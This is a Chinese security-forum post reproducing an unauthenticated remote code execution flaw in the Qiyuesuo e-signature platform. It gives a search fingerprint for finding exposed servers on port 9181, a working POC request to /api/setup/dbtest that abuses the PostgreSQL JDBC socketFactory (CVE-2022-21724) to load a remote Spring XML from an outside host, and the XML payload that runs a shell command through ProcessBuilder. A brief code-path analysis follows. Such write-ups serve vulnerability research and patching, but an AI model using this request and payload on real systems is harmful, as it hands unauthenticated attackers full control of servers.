【漏洞复现】契约锁远程代码执行漏洞-网络安全论坛-网络安全-阻击者联盟

【漏洞复现】契约锁远程代码执行漏洞

勾八徽章-人气大使-阻击者联盟等级-LV2-阻击者联盟15天前发布
140

先关注,不迷路.

免责声明

       请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

漏洞介绍

契约锁是一个电子签章及印章管控平台,提供的电子文件具有与纸质文件一样的法律效力。近日,契约锁发布安全补丁修复了远程代码执行漏洞。该漏洞允许未经过身份认证的攻击者可以利用该漏洞在契约锁管理端上执行任意代码,从而完全控制服务器。。

语法

app="契约锁-电子签署平台"&& port="9181"

漏洞复现

d2b5ca33bd20250616145649

POC:

/setup/dbtest
/api/setup/dbtest?db=POSTGRESQL&host=localhost&port=5321&username=root&name=test%2F%3FsocketFactory%3Dorg%2Espringframework%2Econtext%2Esupport%2EClassPathXmlApplicationContext%26socketFactoryArg%3Dhttp%3A%2F%2Fxxx.dnslog.cn%2F1%2Exml

d2b5ca33bd20250616145723

d2b5ca33bd20250616145738

d2b5ca33bd20250616145752

漏洞分析

接口位置:

qiyuesuo\privoss.jar!\BOOT-INF\classes\com\qiyuesuo\setup\SetupController.class

参数为db、name、host、port、username、password

d2b5ca33bd20250616145901

跟进validateDatabase 方法 ,来到

privoss.jar!\BOOT-INF\classes\com\qiyuesuo\setup\SetupService.class

d2b5ca33bd20250616145925

d2b5ca33bd20250616145931

跟进

d2b5ca33bd20250616145941

支持的jdbc

d2b5ca33bd20250616145950

漏洞利用的是PostgreSQL JDBC Driver RCE(CVE-2022-21724)

<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xmlns:p="http://www.springframework.org/schema/p"
       xsi:schemaLocation="http://www.springframework.org/schema/beans
        http://www.springframework.org/schema/beans/spring-beans.xsd">
   <bean id="exec" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
          <list>
            <value>/bin/sh</value>
            <value>-c</value>
            <value>touch /tmp/test</value>
          </list>
        </constructor-arg>
    </bean>
</beans>

d2b5ca33bd20250616150007

 

 

评分
欢迎为Ta评分
分享
请登录后发表评论

    没有回复内容

zibll子比主题
本站同款主题模板
zibll子比主题是一款漂亮优雅的网站主题模板,功能强大,配置简单。
查看详情
发布帖子
在手机上浏览此页面